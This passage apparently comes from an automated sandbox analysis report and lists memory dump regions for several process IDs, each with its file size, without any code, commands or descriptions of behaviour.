                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5.7MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/1920-127-0x0000000000400000-0x00000000009B6000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5.7MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/1920-423-0x0000000000400000-0x00000000009B6000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5.7MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/1920-136-0x0000000000400000-0x00000000009B6000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5.7MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/1920-450-0x0000000000400000-0x00000000009B6000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5.7MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/1924-96-0x0000000000400000-0x0000000000AB9000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        6.7MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/1924-92-0x0000000000400000-0x0000000000AB9000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        6.7MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/1924-120-0x0000000000400000-0x0000000000AB9000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        6.7MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/1924-94-0x0000000000400000-0x0000000000AB9000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        6.7MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/1924-95-0x0000000000400000-0x0000000000AB9000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        6.7MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/1924-93-0x0000000000400000-0x0000000000AB9000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        6.7MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/1924-97-0x0000000000400000-0x0000000000AB9000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        6.7MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/1972-246-0x0000000001010000-0x00000000010FC000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        944KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/1972-243-0x0000000001010000-0x00000000010FC000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        944KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/2448-142-0x0000000000400000-0x0000000000420000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        128KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/2568-368-0x0000000000400000-0x000000000056F000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1.4MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/2832-128-0x0000000004140000-0x00000000046F6000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5.7MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/2832-449-0x0000000000400000-0x0000000000AB9000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        6.7MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/2832-367-0x0000000000400000-0x0000000000AB9000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        6.7MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/2832-103-0x0000000000400000-0x0000000000AB9000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        6.7MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/2832-99-0x0000000000400000-0x0000000000AB9000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        6.7MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/2832-100-0x0000000000400000-0x0000000000AB9000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        6.7MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/2832-439-0x0000000000400000-0x0000000000AB9000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        6.7MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/2832-101-0x0000000000400000-0x0000000000AB9000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        6.7MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/2832-102-0x0000000000400000-0x0000000000AB9000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        6.7MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/2832-452-0x0000000000400000-0x0000000000AB9000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        6.7MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/2832-104-0x0000000000400000-0x0000000000AB9000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        6.7MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/2832-125-0x0000000003B80000-0x0000000004136000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5.7MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/2832-646-0x0000000000400000-0x0000000000AB9000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        6.7MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/2832-242-0x0000000000400000-0x0000000000AB9000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        6.7MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/2832-742-0x0000000004140000-0x00000000046F6000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5.7MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/2832-151-0x0000000000400000-0x0000000000AB9000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        6.7MB